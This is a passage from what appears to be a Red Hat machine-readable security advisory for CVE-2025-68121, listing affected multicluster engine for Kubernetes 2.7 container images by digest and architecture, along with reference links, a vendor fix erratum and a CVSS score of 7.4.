"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:23:47+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.12/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5636"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
